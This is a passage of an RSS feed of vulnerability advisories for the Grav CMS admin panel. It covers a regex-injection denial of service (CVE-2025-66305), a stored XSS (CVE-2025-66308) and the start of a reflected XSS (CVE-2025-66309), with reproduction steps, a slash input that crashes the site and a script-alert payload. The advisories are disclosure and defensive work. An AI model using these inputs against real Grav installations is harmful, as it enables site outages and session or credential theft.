    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://fluidattacks.com/pt/advisories/travis&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://fluidattacks.com/pt/advisories/travis&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 09 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66305</title>
        <link>https://www.cvehunters.com/p/cve-2025-66305/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66305/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66305-denial-of-service-via-improper-input-handling-in-supported-parameter&amp;#34;&amp;gt;CVE-2025-66305: Denial of Service via Improper Input Handling in &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; Parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Denial of Service (DoS) vulnerability was identified in the &amp;lt;b&amp;gt;&amp;#34;Languages&amp;#34;&amp;lt;/b&amp;gt; submenu of the Grav &amp;lt;b&amp;gt;admin configuration panel&amp;lt;/b&amp;gt; (&amp;lt;code&amp;gt;/admin/config/system&amp;lt;/code&amp;gt;). Specifically, the &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (&amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;) or an XSS test string—it causes a fatal regular expression parsing error on the server.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66305-denial-of-service-via-improper-input-handling-in-supported-parameter&amp;#34;&amp;gt;CVE-2025-66305: Denial of Service via Improper Input Handling in &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; Parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66305&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Denial of Service (DoS) vulnerability was identified in the &amp;lt;b&amp;gt;&amp;#34;Languages&amp;#34;&amp;lt;/b&amp;gt; submenu of the Grav &amp;lt;b&amp;gt;admin configuration panel&amp;lt;/b&amp;gt; (&amp;lt;code&amp;gt;/admin/config/system&amp;lt;/code&amp;gt;). Specifically, the &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; parameter fails to properly validate user input. If a malformed value is inserted—such as a single forward slash (&amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;) or an XSS test string—it causes a fatal regular expression parsing error on the server.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application dynamically constructs a regular expression using the contents of the &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; field without escaping the input using &amp;lt;code&amp;gt;preg_quote()&amp;lt;/code&amp;gt; or proper validation. This allows attackers to inject invalid syntax into the regex engine, crashing the application during language resolution.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;stack-trace-excerpt&amp;#34;&amp;gt;Stack trace excerpt:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;Whoops \ Exception \ ErrorException (E_WARNING) preg_match(): Unknown modifier &amp;#39;o&amp;#39; /system/src/Grav/Common/Language/Language.php244&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/config/system&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Submenu: &amp;lt;code&amp;gt;Languages&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log into the Grav Admin Panel.&amp;lt;/br&amp;gt;
    &amp;lt;li&amp;gt;Navigate to: &amp;lt;b&amp;gt;Configuration → System → Languages&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Locate the &amp;lt;code&amp;gt;Supported&amp;lt;/code&amp;gt; field.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Insert a payload (e.g., a single slash &amp;lt;code&amp;gt;/&amp;lt;/code&amp;gt;).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Click &amp;lt;b&amp;gt;Save&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66305/image.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;639&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66305/image_hu_c3420762a046330d.png 480w, /p/cve-2025-66305/image_hu_3d12dcd60c603267.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;296&amp;#34;
		data-flex-basis=&amp;#34;712px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Observe: All pages in the application begin throwing a fatal error and become inaccessible.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66305/image-1.png&amp;#34;
	width=&amp;#34;1802&amp;#34;
	height=&amp;#34;998&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66305/image-1_hu_3cf5c52544b0b6fa.png 480w, /p/cve-2025-66305/image-1_hu_379d1b4d6d7e7b50.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;433px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Application-wide Denial of Service (DoS).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;All login and admin views crash with the same error.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potentially exploitable by: Admin panel users; CSRF if misconfigured.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-m8vh-v6r6-w7p6&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66308</title>
        <link>https://www.cvehunters.com/p/cve-2025-66308/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66308/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66308-cross-site-scripting-xss-stored-endpoint-adminconfigsite-parameter-datataxonomies&amp;#34;&amp;gt;CVE-2025-66308: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; endpoint of the &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt; application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt; parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66308-cross-site-scripting-xss-stored-endpoint-adminconfigsite-parameter-datataxonomies&amp;#34;&amp;gt;CVE-2025-66308: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66308&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/config/site&amp;lt;/code&amp;gt; endpoint of the &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt; application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt; parameter. The injected payload is stored on the server and automatically executed in the browser of any user who accesses the affected site configuration, resulting in a persistent attack vector.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/config/site&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application does not properly validate or sanitize input in the &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt; field. As a result, an attacker can inject JavaScript code, which is stored in the site configuration and later rendered in the administrative interface or site output, causing automatic execution in the user&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;XSS-PoC&amp;amp;#39;)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log in to the &amp;lt;i&amp;gt;Grav&amp;lt;/i&amp;gt; Admin Panel with sufficient permissions to modify site configuration.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Navigate to &amp;lt;b&amp;gt;Configuration &amp;gt; Site&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;In the &amp;lt;b&amp;gt;Taxonomies Types&amp;lt;/b&amp;gt; field (which maps to &amp;lt;code&amp;gt;data[taxonomies]&amp;lt;/code&amp;gt;), insert the payload.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Save the configuration.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;628&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image_hu_2db52fe672979960.png 480w, /p/cve-2025-66308/image_hu_3b02d8d0dfaa4c28.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;302&amp;#34;
		data-flex-basis=&amp;#34;724px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Go on Pages and click on one of them.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-1.png&amp;#34;
	width=&amp;#34;932&amp;#34;
	height=&amp;#34;587&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image-1_hu_31314f0d34cb0fe9.png 480w, /p/cve-2025-66308/image-1_hu_b304d93e6237dbae.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;158&amp;#34;
		data-flex-basis=&amp;#34;381px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The stored payload is executed immediately in the browser, confirming the Stored XSS vulnerability.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-2.png&amp;#34;
	width=&amp;#34;1204&amp;#34;
	height=&amp;#34;377&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image-2_hu_44fbaf72eed9e907.png 480w, /p/cve-2025-66308/image-2_hu_3e2f9566dc2c6480.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;319&amp;#34;
		data-flex-basis=&amp;#34;766px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The HTTP request submitted during this process contains the vulnerable parameter and payload:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66308/image-3.png&amp;#34;
	width=&amp;#34;757&amp;#34;
	height=&amp;#34;675&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66308/image-3_hu_862cece54be2132a.png 480w, /p/cve-2025-66308/image-3_hu_377bd8a8e99a5dbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;112&amp;#34;
		data-flex-basis=&amp;#34;269px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-gqxx-248x-g29f&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66309</title>
        <link>https://www.cvehunters.com/p/cve-2025-66309/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66309/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66309-cross-site-scripting-xss-reflected-endpoint-adminpagespage-parameter-dataheadercontentitems-located-in-the-blog-config-tab&amp;#34;&amp;gt;CVE-2025-66309: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt;, parameter &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;, located in the &amp;amp;ldquo;Blog Config&amp;amp;rdquo; tab
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user input in the &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt; parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim&amp;#39;s browser session.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66309-cross-site-scripting-xss-reflected-endpoint-adminpagespage-parameter-dataheadercontentitems-located-in-the-blog-config-tab&amp;#34;&amp;gt;CVE-2025-66309: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt;, parameter &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;, located in the &amp;amp;ldquo;Blog Config&amp;amp;rdquo; tab
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
